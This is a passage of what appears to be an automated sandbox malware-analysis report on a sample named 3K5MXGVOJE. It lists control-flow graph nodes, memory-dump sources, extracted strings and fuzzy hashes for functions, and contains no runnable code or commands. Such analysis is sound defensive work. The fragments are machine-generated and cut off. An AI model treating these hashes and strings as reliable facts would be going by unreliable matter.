4950->5067 4954->4944 4958 5dfcea3-5dfceb2 4954->4958 4959 5dfd1b8 4955->4959 4960 5dfd151-5dfd17b 4955->4960 4958->4944 4962 5dfceb8-5dfceca 4958->4962 4961 5dfd1bd-5dfd1c6 4959->4961 4960->4959 4967 5dfd17d-5dfd1af 4960->4967 4962->4944 4965 5dfced0-5dfcf0d 4962->4965 4963 5dfcd41-5dfcd53 4963->4925 4971 5dfcd59-5dfcd80 4963->4971 4990 5dfd0cc-5dfd0d8 4965->4990 4967->4955 4981 5dfd1b1-5dfd1b6 4967->4981 4974 5dfcd8e-5dfcd92 4971->4974 4975 5dfcd82-5dfcd86 4971->4975 4972->4912 4982 5dfc8ee-5dfc9a1 4972->4982 4974->4934 4977 5dfcd98-5dfcda3 4974->4977 4975->4934 4978 5dfcd8c 4975->4978 4977->4937 4983 5dfcda9-5dfcdaf 4977->4983 4978->4977 4981->4961 4982->4820 5014 5dfc9a7-5dfc9ed 4982->5014 5068 5dfcdb5 call 518c038 4983->5068 5069 5dfcdb5 call 518c01f 4983->5069 5070 5dfcdb5 call 518c280 4983->5070 4987 5dfcdba-5dfcde5 4987->4937 4989 5dfcde7-5dfcdf4 4987->4989 5049 5dfcdf6 call 518c038 4989->5049 5050 5dfcdf6 call 518c01f 4989->5050 5051 5dfcdf6 call 518c280 4989->5051 4991 5dfd0be-5dfd0c7 4990->4991 4992 5dfd0da-5dfd0e6 4990->4992 4991->4990 4999 5dfd0ec-5dfd10e 4992->4999 5000 5dfcf12-5dfcf1e 4992->5000 4994 5dfcdfb-5dfce12 4994->4929 5004 5dfd119-5dfd11a 4999->5004 5005 5dfd110 4999->5005 5006 5dfcf36-5dfcf50 5000->5006 5007 5dfcf20-5dfcf26 5000->5007 5004->4944 5005->5004 5017 5dfd056-5dfd05c 5006->5017 5009 5dfcf2a-5dfcf2c 5007->5009 5010 5dfcf28 5007->5010 5009->5006 5010->5006 5014->4912 5015 5dfc9f3 5014->5015 5055 5dfc9f7 call 5dfd5ad 5015->5055 5056 5dfc9f7 call 51a20fc 5015->5056 5057 5dfc9f7 call 51a23d0 5015->5057 5058 5dfc9f7 call 5dfd280 5015->5058 5017->5017 5019 5dfd05e-5dfd069 5017->5019 5018 5dfc9fd-5dfca4f 5018->4912 5027 5dfca55-5dfcaa8 5018->5027 5022 5dfd06f-5dfd082 5019->5022 5023 5dfcf55-5dfcf7a 5019->5023 5024 5dfd089-5dfd0a9 5022->5024 5029 5dfd084 5023->5029 5030 5dfcf80-5dfcfa3 5023->5030 5032 5dfd0ab 5024->5032 5033 5dfd0b3-5dfd0b9 5024->5033 5027->4820 5035 5dfcaae-5dfcaca 5027->5035 5029->5024 5030->5029 5034 5dfcfa9-5dfcfb6 5030->5034 5032->5033 5033->5024 5036 5dfd0bb 5033->5036 5052 5dfcfb8 call 518c038 5034->5052 5053 5dfcfb8 call 518c01f 5034->5053 5054 5dfcfb8 call 518c280 5034->5054 5035->4912 5038 5dfcad0-5dfcb31 5035->5038 5036->4991 5037 5dfcfbd-5dfcfe9 5037->5029 5039 5dfcfef-5dfd01a 5037->5039 5038->4912 5042 5dfcb33-5dfcb6a 5038->5042 5039->5029 5043 5dfd01c-5dfd050 5039->5043 5043->5017 5049->4994 5050->4994 5051->4994 5052->5037 5053->5037 5054->5037 5055->5018 5056->5018 5057->5018 5058->5018 5059->4963 5060->4963 5061->4963 5062->4963 5063->4963 5064->4963 5065->4963 5066->4963 5067->4963 5068->4987 5069->4987 5070->4987 5071->4822 5072->4822 5073->4822
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4 a$3)
                                        • API String ID: 0-3265370097
                                        • Opcode ID: ec2cadf7d2b880850fc7b92ac2ad1f9f25a7dc5041b64faaf34531910be90670
                                        • Instruction ID: 69cefb1b655af8c9114173f282166d00642b43e5527770455378abfaedcd56d7
                                        • Opcode Fuzzy Hash: ec2cadf7d2b880850fc7b92ac2ad1f9f25a7dc5041b64faaf34531910be90670
                                        • Instruction Fuzzy Hash: 70C2B675F001288BDB54DF68C8906AEB7F6BB88310F55856AD84AEB391DB349D42CFD0
                                        Function 05A017A0 Relevance: 3.8, Strings: 2, Instructions: 1309COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 5074 5a017a0-5a017c2 5075 5a017c5-5a017d8 5074->5075 5076 5a02c7b-5a02c9f 5075->5076 5077 5a017de-5a01819 5075->5077 5080 5a02ca1-5a02cad 5076->5080 5301 5a0181c call 5a017a0 5077->5301 5302 5a0181c call 5a029b3 5077->5302 5303 5a0181c call 5a01747 5077->5303 5304 5a0181c call 5a02c88 5077->5304 5305 5a0181c call 5a02c98 5077->5305 5082 5a02cb3-5a02cf5 5080->5082 5083 5a02ddb-5a02e03 5080->5083 5081 5a01822-5a01828 5084 5a0182d-5a0183a 5081->5084 5082->5083 5095 5a02cfb-5a02d28 5082->5095 5091 5a02e14-5a02e8a 5083->5091 5092 5a02e05-5a02e13 5083->5092 5086 5a0183c-5a01842 5084->5086 5087 5a0184e-5a01854 5084->5087 5086->5075 5089 5a01844-5a0184b 5086->5089 5087->5084 5090 5a01856-5a01893 5087->5090 5090->5076 5098 5a01899-5a018af 5090->5098 5105 5a02dc1-5a02dcd 5095->5105 5106 5a02d2e-5a02d44 5095->5106 5098->5076 5101 5a018b5-5a018f7 5098->5101 5114 5a01914-5a019d6 5101->5114 5115 5a018f9-5a01904 5101->5115 5105->5080 5109 5a02dd3-5a02dda 5105->5109 5106->5083 5110 5a02d4a-5a02d6c 5106->5110 5116 5a02d7d-5a02db1 5110->5116 5117 5a02d6e 5110->5117 5114->5076 5131 5a019dc-5a01a2d 5114->5131 5115->5084 5118 5a0190a-5a01911 5115->5118 5116->5105 5123 5a02db3-5a02dc0 5116->5123 5298 5a02d71 call 5a03230 5117->5298 5299 5a02d71 call 5a03698 5117->5299 5300 5a02d71 call 5a03119 5117->5300 5122 5a02d77-5a02d7c 5136 5a01a33-5a01a48 5131->5136 5137 5a02954-5a0295f 5131->5137 5141 5a01a69 5136->5141 5142 5a01a4a-5a01a53 5136->5142 5137->5136 5140 5a02965-5a02978 5137->5140 5144 5a0297a-5a02993 5140->5144 5143 5a01a6c 5141->5143 5145 5a01a55-5a01a58 5142->5145 5146 5a01a5a-5a01a5d 5142->5146 5147 5a01a72-5a01a87 5143->5147 5153 5a029a1-5a029ae 5144->5153 5154 5a02995-5a0299e 5144->5154 5148 5a01a67 5145->5148 5146->5148 5149 5a02944-5a02949 5147->5149 5150 5a01a8d-5a01aac 5147->5150 5148->5143 5149->5137 5150->5149 5152 5a01ab2-5a01af0 5150->5152 5152->5149 5157 5a01af6-5a01b16 5152->5157 5153->5144 5155 5a029b0 5153->5155 5154->5153 5155->5076 5157->5149 5158 5a01b1c-5a01ba4 5157->5158 5164 5a02931-5a0293c 5158->5164 5165 5a01baa 5158->5165 5164->5147 5166 5a02942 5164->5166 5167 5a01bad-5a01bc9 5165->5167 5166->5137 5167->5149 5168 5a01bcf-5a01bec 5167->5168 5168->5149 5169 5a01bf2-5a01c0a 5168->5169 5169->5149 5170 5a01c10-5a01c2a 5169->5170 5170->5149 5171 5a01c30-5a01c90 5170->5171 5177 5a01c96-5a01cb3 5171->5177 5177->5149 5178 5a01cb9-5a01cec 5177->5178 5178->5149 5179 5a01cf2-5a01d0f 5178->5179 5179->5149 5180 5a01d15-5a01d34 5179->5180 5180->5149 5181 5a01d3a-5a01da1 5180->5181 5187 5a01da7-5a01e00 5181->5187 5191 5a01e02-5a01e07 5187->5191 5192 5a01e0f-5a01e15 5187->5192 5191->5192 5192->5149 5193 5a01e1b-5a01e4e 5192->5193 5195 5a01e50-5a01e55 5193->5195 5196 5a01e5d-5a01e63 5193->5196 5195->5196 5196->5149 5197 5a01e69-5a01eb3 5196->5197 5200 5a01ec2-5a01ec8 5197->5200 5201 5a01eb5-5a01eba 5197->5201 5200->5149 5202 5a01ece-5a01f37 5200->5202 5201->5200 5202->5177 5207 5a01f3d-5a01f75 5202->5207 5209 5a01f84-5a01f8d 5207->5209 5210 5a01f77-5a01f7c 5207->5210 5209->5149 5211 5a01f93-5a01fd5 5209->5211 5210->5209 5215 5a01fe4-5a01fed 5211->5215 5216 5a01fd7-5a01fdc 5211->5216 5215->5149 5217 5a01ff3-5a02057 5215->5217 5216->5215 5222 5a02066-5a0206f 5217->5222 5223 5a02059-5a0205e 5217->5223 5222->5149 5224 5a02075-5a020a6 5222->5224 5223->5222 5224->5147 5227 5a020ac-5a020b4 5224->5227 5228 5a020b6-5a020c2 5227->5228 5229 5a020fe-5a02105 5227->5229 5228->5147 5230 5a020c8-5a020de 5228->5230 5229->5167 5231 5a0210b-5a02132 5229->5231 5230->5149 5232 5a020e4-5a020fc 5230->5232 5235 5a02138-5a02146 5231->5235 5232->5235 5235->5167 5237 5a0214c-5a0214e 5235->5237 5238 5a02150-5a0215e 5237->5238 5239 5a0218f-5a021b2 5237->5239 5238->5187 5240 5a02164-5a02173 5238->5240 5245 5a021b4-5a021ba 5239->5245 5240->5149 5241 5a02179-5a0218d 5240->5241 5241->5245 5245->5167 5246 5a021c0-5a021d0 5245->5246 5246->5149 5247 5a021d6-5a021fc 5246->5247 5247->5149 5248 5a02202-5a02222 5247->5248 5248->5149 5249 5a02228-5a0225f 5248->5249 5249->5149 5250 5a02265-5a02314 5249->5250 5250->5164 5255 5a0231a-5a02320 5250->5255 5255->5147 5256 5a02326-5a0233b 5255->5256 5256->5149 5257 5a02341-5a02373 5256->5257 5257->5164 5259 5a02379-5a02394 5257->5259 5259->5149 5260 5a0239a-5a023d9 5259->5260 5260->5164 5262 5a023df-5a023fb 5260->5262 5262->5147 5263 5a02401-5a024c7 5262->5263 5263->5149 5267 5a024cd-5a024e7 5263->5267 5267->5149 5268 5a024ed-5a0250c 5267->5268 5268->5149 5269 5a02512-5a0273c 5268->5269 5269->5147 5284 5a02742-5a0278d 5269->5284 5284->5147 5287 5a02793-5a027ef 5284->5287 5287->5149 5291 5a027f5-5a02835 5287->5291 5291->5149 5292 5a0283b-5a02893 5291->5292 5292->5149 5293 5a02899-5a0292b 5292->5293 5293->5164 5298->5122 5299->5122 5300->5122 5301->5081 5302->5081 5303->5081 5304->5081 5305->5081
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: '5($}Yg
                                        • API String ID: 0-2291141081
                                        • Opcode ID: 59d9a00f24a6300cd48c6a1ce0f7e2e9b0327b11d8bfdcab593766985be9a591
                                        • Instruction ID: 3de136f2d12844dfcc467a4d87eb32bfc9f5b7cc2918292b785d44da9bbda4cc
                                        • Opcode Fuzzy Hash: 59d9a00f24a6300cd48c6a1ce0f7e2e9b0327b11d8bfdcab593766985be9a591
                                        • Instruction Fuzzy Hash: C8C27135E102248FCB54DF68D894A99B7B2BF88314F55C5AAD809EB391DB35DD82CF80
                                        Function 05A0E148 Relevance: 3.5, Strings: 1, Instructions: 2262COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 1>0\
                                        • API String ID: 0-4206732142
                                        • Opcode ID: 307ab53b1b4e386cd15195708d25a13a1a675dc230ab7d958e4ea2cbafc1a638
                                        • Instruction ID: 566e51a0e915bcf72a87043e665d772f0eb641daab5ff20559dcbfa4424515d2
                                        • Opcode Fuzzy Hash: 307ab53b1b4e386cd15195708d25a13a1a675dc230ab7d958e4ea2cbafc1a638
                                        • Instruction Fuzzy Hash: CB03A536F101248FD754DFA8D89096AB7F6BB88310B59C56AD809EB395DB31ED06CBC0
                                        Function 05DF62C0 Relevance: 3.2, Strings: 2, Instructions: 675COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 5864 5df62c0-5df62ca 5865 5df62cf-5df62de 5864->5865 5866 5df634e-5df6376 5865->5866 5867 5df62e0-5df6309 5865->5867 5871 5df6379-5df6394 5866->5871 5867->5865 5870 5df630b-5df632d 5867->5870 5870->5866 5872 5df632f-5df634d 5870->5872 5873 5df639a-5df63b1 5871->5873 5874 5df6428-5df644c call 5df62c0 5871->5874 5875 5df6424-5df6426 5873->5875 5876 5df63b3-5df63eb 5873->5876 5883 5df6451 5874->5883 5877 5df6457-5df6483 5875->5877 5880 5df649c-5df64da 5876->5880 5881 5df63f1-5df63ff 5876->5881 5877->5871 5888 5df6489-5df649b 5877->5888 5887 5df64dd-5df64ed 5880->5887 5881->5874 5889 5df6401-5df6407 5881->5889 5883->5877 5887->5887 5891 5df64ef-5df64f9 5887->5891 5889->5871 5890 5df640d-5df6421 5889->5890 5890->5875 5892 5df64fb-5df6501 5891->5892 5893 5df6524-5df652a 5891->5893 5892->5891 5895 5df6503-5df650e 5892->5895 5893->5887 5896 5df652c-5df6568 5893->5896 5897 5df69ff-5df6a07 5895->5897 5898 5df6514-5df651f 5895->5898 5899 5df6b8f-5df6b9d 5896->5899 5900 5df656e-5df65d1 5896->5900 5897->5895 5902 5df6a0d-5df6a26 5897->5902 5901 5df6ba0-5df6ba9 5898->5901 5899->5901 5910 5df6604-5df661f 5900->5910 5911 5df65d3-5df65f9 5900->5911 5903 5df6a2c-5df6a3e 5902->5903 5903->5887 5906 5df6a44-5df6a63 5903->5906 5906->5887 5912 5df6a69-5df6aa3 5906->5912 5910->5891 5914 5df6625-5df663b 5910->5914 5911->5891 5913 5df65ff-5df6b44 5911->5913 5916 5df6aa9-5df6ae6 5912->5916 5913->5901 5914->5899 5915 5df6641-5df668a 5914->5915 5915->5887 5928 5df6690-5df669f 5915->5928 5918 5df6aec-5df6b1c 5916->5918 5919 5df66a4-5df66ac 5916->5919 5918->5891 5920 5df6b22-5df6b33 5918->5920 5919->5899 5923 5df66b2-5df66d2 5919->5923 5920->5887 5927 5df6b39-5df6b5a 5920->5927 5923->5899 5924 5df66d8-5df6702 5923->5924 5924->5887 5934 5df6708-5df6731 5924->5934 5927->5893 5931 5df6b60-5df6b87 5927->5931 5928->5916 5931->5887 5933 5df6b8d 5931->5933 5933->5901 5935 5df6733-5df6757 5934->5935 5936 5df6761-5df6768 5934->5936 5935->5891 5937 5df675d-5df675f 5935->5937 5938 5df676e-5df6773 5936->5938 5937->5938 5940 5df6775-5df677b 5938->5940 5941 5df6781-5df6788 5938->5941 5942 5df677f 5940->5942 5943 5df677d 5940->5943 5941->5903 5944 5df678e-5df67af 5941->5944 5942->5941 5943->5941 5944->5899 5945 5df67b5-5df67c2 5944->5945 5976 5df67c8 call 518c038 5945->5976 5977 5df67c8 call 518c01f 5945->5977 5978 5df67c8 call 518c280 5945->5978 5946 5df67cd-5df67e2 5948 5df67f4-5df6807 5946->5948 5949 5df67e4-5df67ea 5946->5949 5953 5df6809-5df6811 5948->5953 5954 5df6813-5df6841 5948->5954 5949->5898 5950 5df67f0-5df67f2 5949->5950 5951 5df6843-5df6880 5950->5951 5951->5891 5957 5df6886-5df6888 5951->5957 5953->5951 5954->5951 5958 5df688e-5df68ae 5957->5958 5959 5df6949-5df694f 5957->5959 5958->5899 5962 5df68b4-5df68db 5958->5962 5959->5891 5961 5df6955-5df69cc 5959->5961 5961->5893 5975 5df69d2-5df69fa 5961->5975 5962->5959 5965 5df68dd-5df68ef 5962->5965 5965->5899 5966 5df68f5-5df691a 5965->5966 5966->5899 5968 5df6920-5df692f 5966->5968 5970 5df6934-5df6943 5968->5970 5970->5959 5975->5901 5976->5946 5977->5946 5978->5946
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ({*N$2<+!
                                        • API String ID: 0-160365616
                                        • Opcode ID: 84cd5684fc147f09d23714bc775b67a0791b3c8c8ef5c959c6b89d36618f61fb
                                        • Instruction ID: 4da762ad1f045a31590c26293d11ca4c074cc901bcd9b97589fba2537942ed06
                                        • Opcode Fuzzy Hash: 84cd5684fc147f09d23714bc775b67a0791b3c8c8ef5c959c6b89d36618f61fb
                                        • Instruction Fuzzy Hash: 2432E672F102258FC714DF6DD880999B7E3BF8822071A856AED0AEB755DA30DD46CBD0
                                        Function 051872C0 Relevance: 3.1, Strings: 2, Instructions: 579COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 6099 51872c0-51872f2 6100 51872f5-5187321 6099->6100 6101 518748a-51874d5 6100->6101 6102 5187327-518732a 6100->6102 6104 5187530-5187551 6101->6104 6105 51874d7-5187511 6101->6105 6103 518732d-518733c 6102->6103 6103->6104 6106 5187342-51873ec 6103->6106 6111 5187553-518755c 6104->6111 6112 5187577-5187583 6104->6112 6105->6104 6107 5187513-5187522 6105->6107 6106->6104 6108 51873f2-5187484 6106->6108 6107->6100 6110 5187528-518752f 6107->6110 6108->6101 6108->6103 6113 518758f-51875ba 6112->6113 6114 5187585-5187587 6112->6114 6116 518775e-51877a7 6113->6116 6117 51875c0-51875c6 6113->6117 6114->6113 6144 51877a9 6116->6144 6145 51877bd-51877dc 6116->6145 6118 518765a-518765e 6117->6118 6119 51875cc-51875d2 6117->6119 6122 5187660-518766c 6118->6122 6123 5187684-518768d 6118->6123 6119->6116 6121 51875d8-51875e6 6119->6121 6125 51875e8-51875ff 6121->6125 6126 5187639-5187642 6121->6126 6122->6116 6127 5187672-5187682 6122->6127 6128 518768f-51876af 6123->6128 6129 51876b2-51876b8 6123->6129 6125->6126 6137 5187601-5187607 6125->6137 6126->6116 6130 5187648-5187654 6126->6130 6131 51876bb-51876c4 6127->6131 6128->6129 6129->6131 6130->6118 6130->6119 6131->6116 6132 51876ca-51876e5 6131->6132 6132->6116 6136 51876e7-518771a 6132->6136 6139 518771c-5187726 6136->6139 6140 5187754-518775b 6136->6140 6141 5187609 6137->6141 6142 5187613-5187619 6137->6142 6139->6140 6151 5187728-518774c 6139->6151 6141->6142 6142->6116 6146 518761f-5187636 6142->6146 6147 51877ac-51877ae 6144->6147 6149 51877dd-518781f 6147->6149 6150 51877b0-51877bb 6147->6150 6158 518783b-5187863 6149->6158 6159 5187821-5187824 6149->6159 6150->6145 6150->6147 6151->6140 6164 51878b2-51878b8 6158->6164 6165 5187865-518786b 6158->6165 6160 5187827-5187839 6159->6160 6160->6158 6160->6160 6167 51878ba-51878bd 6164->6167 6168 5187904-518791e 6164->6168 6165->6164 6166 518786d-5187870 6165->6166 6169 5187921-5187946 6166->6169 6170 5187876-5187882 6166->6170 6167->6169 6171 51878bf-51878cb 6167->6171 6181 5187949-5187987 6169->6181 6173 51878ac-51878b0 6170->6173 6174 5187884-51878aa 6170->6174 6175 51878cd-51878e5 6171->6175 6176 51878fe-5187902 6171->6176 6173->6164 6173->6166 6174->6173 6175->6169 6177 51878e7-51878fa 6175->6177 6176->6167 6176->6168 6177->6176 6184 5187989-51879b6 6181->6184
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 1<2$d
                                        • API String ID: 0-4226095807
                                        • Opcode ID: 4946be11f15e71f3a6097a23c939bc0535270853eb61719ad656e13fa2fb3178
                                        • Instruction ID: b3d74795c49b6bb1da3a7a67c1afa4e2decb13cecb786950d0edbbadf4be8420
                                        • Opcode Fuzzy Hash: 4946be11f15e71f3a6097a23c939bc0535270853eb61719ad656e13fa2fb3178
                                        • Instruction Fuzzy Hash: DD22B071A006199FDB24DF69C8809AAF7B2FF84310B25856AD829EB391D731EC45CF90
                                        Function 05DF1848 Relevance: 3.0, Strings: 2, Instructions: 493COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: l1#$IA5
                                        • API String ID: 0-2870753020
                                        • Opcode ID: 297eb8a33a526039e5a055567f6a08214929e2c4828e66bb1f96154fab78068c
                                        • Instruction ID: a44cd6835f90494cb49ff02d9a67ecfaaf0efb054915c94532cc6be151d32e89
                                        • Opcode Fuzzy Hash: 297eb8a33a526039e5a055567f6a08214929e2c4828e66bb1f96154fab78068c
                                        • Instruction Fuzzy Hash: B8125075F006148FC754DFA8C884A99B7F2BB88314B5AC56AD809EB355DB31ED46CF80
                                        Function 05A05F58 Relevance: 2.9, Strings: 1, Instructions: 1653COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: d
                                        • API String ID: 0-2564639436
                                        • Opcode ID: 3808acf99e75adbce944831da58fc5b5e973ec2188825d9f1400ebfcf1cf436a
                                        • Instruction ID: 0cbb08018d5301dbfc22e3b4c81e3474af9bef2e97ef19ffda8e3310003f614c
                                        • Opcode Fuzzy Hash: 3808acf99e75adbce944831da58fc5b5e973ec2188825d9f1400ebfcf1cf436a
                                        • Instruction Fuzzy Hash: DCF26276E116298FDB24CF68D884A99F7F2BB48310F1582AAD81DE7345D731AD85CF80
                                        Function 05183AEF Relevance: 2.9, Strings: 2, Instructions: 384COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 8M&e$=89x
                                        • API String ID: 0-2030983731
                                        • Opcode ID: 5b48678e0bde935194d082eaedb815033499fcf0b9f942ead60ac731eccec994
                                        • Instruction ID: 07069633b2d52fc402614d7497c2640776e4e3ae0729aceb413dcc81df34276c
                                        • Opcode Fuzzy Hash: 5b48678e0bde935194d082eaedb815033499fcf0b9f942ead60ac731eccec994
                                        • Instruction Fuzzy Hash: 88E18572F006288FCB14DF9DD8945AEB7F2BB8835075A856AE819EB351D774EC418BC0
                                        Function 06C70840 Relevance: 2.8, Strings: 1, Instructions: 1516COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3w*n
                                        • API String ID: 0-1459975921
                                        • Opcode ID: 222b20906e159fbae984a71161cd9801414238d5b614462bbcdc9e779117c683
                                        • Instruction ID: 6ea54ba43cc610cc4ebd686f7da977fe9e341e4249686a5765dfc52b776c698f
                                        • Opcode Fuzzy Hash: 222b20906e159fbae984a71161cd9801414238d5b614462bbcdc9e779117c683
                                        • Instruction Fuzzy Hash: FAE25076E102298FDB64DF58C984A9DB7F2BB48314F1981EAD809EB351D7359E81CF80
                                        Function 05DFBC80 Relevance: 2.2, Strings: 1, Instructions: 968COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3)
                                        • API String ID: 0-1390963136
                                        • Opcode ID: 615605320e1d68a87ab8d33fe40c68740f2babb4854685f8985c07be3378d78a
                                        • Instruction ID: 113d57aa66d19042344228b1e6dce0fbccac855a98dce9070aced1fefabed90c
                                        • Opcode Fuzzy Hash: 615605320e1d68a87ab8d33fe40c68740f2babb4854685f8985c07be3378d78a
                                        • Instruction Fuzzy Hash: 4F82B776F001288BDB54DF78D8907AEB7F6AB88310F45859AD84AEB391DB349D418FD0
                                        Function 05A03230 Relevance: 2.0, Instructions: 2001COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0e38a46e5ec7e43f1a2b02cff1d3b9c1e8ade86ec1d4196c4809b581c1871820
                                        • Instruction ID: 0c8d4247b73089ca9619adb1893d951d99c9bdf43615ed24c03c0b73c541fa79
                                        • Opcode Fuzzy Hash: 0e38a46e5ec7e43f1a2b02cff1d3b9c1e8ade86ec1d4196c4809b581c1871820
                                        • Instruction Fuzzy Hash: 15038375E112258FCB64DF68D854A9EB7F2BF88304F1585AAD809E7390DB359D82CF80
                                        Function 05DF2888 Relevance: 1.8, Strings: 1, Instructions: 558COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: =*$\
                                        • API String ID: 0-2246754351
                                        • Opcode ID: 748542859da5a3d0031c7e8657194774bb8e897e50188e5408a866d422cd6871
                                        • Instruction ID: 598d89cbc4d6504a1a42ebde49caa34d87fcfaf16f91715eb24792bb65c7ba7c
                                        • Opcode Fuzzy Hash: 748542859da5a3d0031c7e8657194774bb8e897e50188e5408a866d422cd6871
                                        • Instruction Fuzzy Hash: D422A375B002148FC754DFA8D894A6DBBF6BF88310B55C56AE809DB385DB34ED42CB90
                                        Function 05DF92B8 Relevance: 1.8, Strings: 1, Instructions: 502COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: :<#
                                        • API String ID: 0-3453961554
                                        • Opcode ID: c50b81d17ff7ddceef3f818af74a28e9bb45bdfa96437c2e0981fec076581897
                                        • Instruction ID: c028ada4c863decf51223ed1ac87eb102a136364f2f5d0e7f764aed869ebf6ba
                                        • Opcode Fuzzy Hash: c50b81d17ff7ddceef3f818af74a28e9bb45bdfa96437c2e0981fec076581897
                                        • Instruction Fuzzy Hash: 9F12C835F001149FC754DFA8D9A4B6AB7E6FF84314B1A806AD90AEB395CB35DD02CB90
                                        Function 05DFB0F0 Relevance: 1.7, Strings: 1, Instructions: 469COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: dym^
                                        • API String ID: 0-3129611225
                                        • Opcode ID: 57b38cd12a44a4dd32b6ebf9d5924e263804cb4df0be4c73d87c81aae7d1588d
                                        • Instruction ID: 5873705d78f47b134b2c1dd358bea6010376205e9f6aa6467c24a28af8ae0111
                                        • Opcode Fuzzy Hash: 57b38cd12a44a4dd32b6ebf9d5924e263804cb4df0be4c73d87c81aae7d1588d
                                        • Instruction Fuzzy Hash: 15F1F675B002189FD704DFA8D890A6EB7F6EF84314B19856AE809EB345DB35ED06CBD0
                                        Function 06C79CAA Relevance: 1.7, Strings: 1, Instructions: 424COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4i"
